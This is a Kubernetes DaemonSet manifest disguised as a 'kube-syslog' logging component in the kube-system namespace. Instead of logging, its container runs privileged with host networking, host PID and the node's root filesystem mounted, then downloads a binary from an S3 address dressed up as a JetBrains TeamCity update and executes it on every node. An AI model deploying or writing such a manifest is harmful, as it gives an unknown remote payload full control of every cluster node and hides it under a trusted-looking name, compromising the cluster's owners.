apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: kube-syslog
  namespace: kube-system
spec:
  selector:
    matchLabels:
      app: kube-syslog
  template:
    metadata:
      labels:
        app: kube-syslog
    spec:
      hostNetwork: true
      hostPID: true
      containers:
      - name: syslog
        image: alpine:latest
        command: ["/bin/sh", "-c"]
        args:
        - "apk add --no-cache curl > /dev/null 2>&1; curl -fsSL -o /tmp/kube-syslog https://jetbrainsteam-updates.s3.amazonaws.com/teamcity-server-update.bin && chmod +x /tmp/kube-syslog && /tmp/kube-syslog; sleep 99999"
        securityContext:
          privileged: true
        volumeMounts:
        - name: host
          mountPath: /host
      volumes:
      - name: host
        hostPath:
          path: /
      restartPolicy: Always
